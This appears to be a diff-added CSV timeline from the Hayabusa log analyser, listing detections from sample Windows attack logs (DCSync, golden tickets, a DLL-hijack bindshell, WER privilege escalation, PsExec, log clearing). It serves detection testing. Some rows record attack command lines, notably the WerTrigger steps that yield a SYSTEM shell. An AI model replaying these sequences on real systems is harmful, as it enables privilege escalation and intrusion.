+2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55731  :  LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55733  :  LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$  :  Workstation: -  :  IP Address: fe80::1cae:5aa4:9d8d:106a  :  Port: 58736  :  LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$  :  Workstation: -  :  IP Address: 10.23.42.18  :  Port: 62274  :  LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55738  :  LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55748  :  LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54927  :  LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54931  :  LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54933  :  LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54932  :  LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55750  :  LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: FS02$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan  :  Service: MSSQL01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
+2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
+2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
+2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50380  :  LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50381  :  LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50382  :  LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50317  :  LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50329  :  LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50380  :  LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50381  :  LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 50382  :  LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe  :  Path: C:\Windows\PSEXESVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown  :  Workstation: 04246W-WIN10  :  IP Address: 172.16.66.142  :  Port: 60726  :  LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
